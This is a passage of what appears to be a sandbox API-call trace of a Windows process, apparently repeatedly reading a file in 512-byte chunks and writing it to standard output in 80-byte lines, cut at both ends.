lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] GetFileType (hFile=0x50) returned 0x1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] GetFileType (hFile=0x50) returned 0x1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.957] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0132.957] GetFileType (hFile=0x50) returned 0x1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] GetFileType (hFile=0x50) returned 0x1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] GetFileType (hFile=0x50) returned 0x1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.957] GetFileType (hFile=0x50) returned 0x1 [0132.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.958] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.958] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.958] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.958] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.958] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, 
lpOverlapped=0x0) returned 1 [0132.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.958] GetFileType (hFile=0x50) returned 0x1 [0132.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.958] GetFileType (hFile=0x50) returned 0x1 [0132.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.958] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.958] GetFileType (hFile=0x50) returned 0x1 [0132.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.958] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.958] GetFileType (hFile=0x50) returned 0x1 [0132.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.958] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.958] GetFileType (hFile=0x50) returned 0x1 [0132.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.958] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.958] GetFileType (hFile=0x50) returned 0x1 [0132.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.959] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 
| out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.959] GetFileType (hFile=0x50) returned 0x1 [0132.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.959] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.959] GetFileType (hFile=0x50) returned 0x1 [0132.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.959] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.959] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.959] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.959] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.959] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.959] GetFileType (hFile=0x50) returned 0x1 [0132.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.959] GetFileType (hFile=0x50) returned 0x1 [0132.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.959] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.959] GetFileType (hFile=0x50) returned 0x1 [0132.959] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0132.959] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.959] GetFileType (hFile=0x50) returned 0x1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] GetFileType (hFile=0x50) returned 0x1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] GetFileType (hFile=0x50) returned 0x1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] GetFileType (hFile=0x50) returned 0x1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] GetFileType (hFile=0x50) returned 0x1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 
[0132.960] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.960] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.960] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.960] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.960] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] GetFileType (hFile=0x50) returned 0x1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] GetFileType (hFile=0x50) returned 0x1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.960] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] GetFileType (hFile=0x50) returned 0x1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] GetFileType (hFile=0x50) returned 0x1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 
[0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] GetFileType (hFile=0x50) returned 0x1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] GetFileType (hFile=0x50) returned 0x1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] GetFileType (hFile=0x50) returned 0x1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] GetFileType (hFile=0x50) returned 0x1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.961] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.961] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.961] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.961] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, 
lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] GetFileType (hFile=0x50) returned 0x1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] GetFileType (hFile=0x50) returned 0x1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.961] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.961] GetFileType (hFile=0x50) returned 0x1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] GetFileType (hFile=0x50) returned 0x1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] GetFileType (hFile=0x50) returned 0x1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] GetFileType (hFile=0x50) returned 0x1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] GetFileType (hFile=0x50) returned 0x1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] GetFileType (hFile=0x50) returned 0x1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.962] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.962] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.962] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.962] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] GetFileType (hFile=0x50) returned 0x1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] GetFileType (hFile=0x50) returned 0x1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.962] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.962] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] GetFileType 
(hFile=0x50) returned 0x1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] GetFileType (hFile=0x50) returned 0x1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] GetFileType (hFile=0x50) returned 0x1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] GetFileType (hFile=0x50) returned 0x1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] GetFileType (hFile=0x50) returned 0x1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] GetFileType (hFile=0x50) returned 0x1 [0132.963] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.963] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.963] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.963] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.963] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] GetFileType (hFile=0x50) returned 0x1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] GetFileType (hFile=0x50) returned 0x1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.963] GetFileType (hFile=0x50) returned 0x1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] GetFileType (hFile=0x50) returned 0x1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, 
lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] GetFileType (hFile=0x50) returned 0x1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] GetFileType (hFile=0x50) returned 0x1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] GetFileType (hFile=0x50) returned 0x1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] GetFileType (hFile=0x50) returned 0x1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.964] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.964] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.964] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.964] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] GetFileType (hFile=0x50) returned 0x1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] GetFileType (hFile=0x50) returned 0x1 [0132.964] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.964] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] GetFileType (hFile=0x50) returned 0x1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] GetFileType (hFile=0x50) returned 0x1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] GetFileType (hFile=0x50) returned 0x1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] 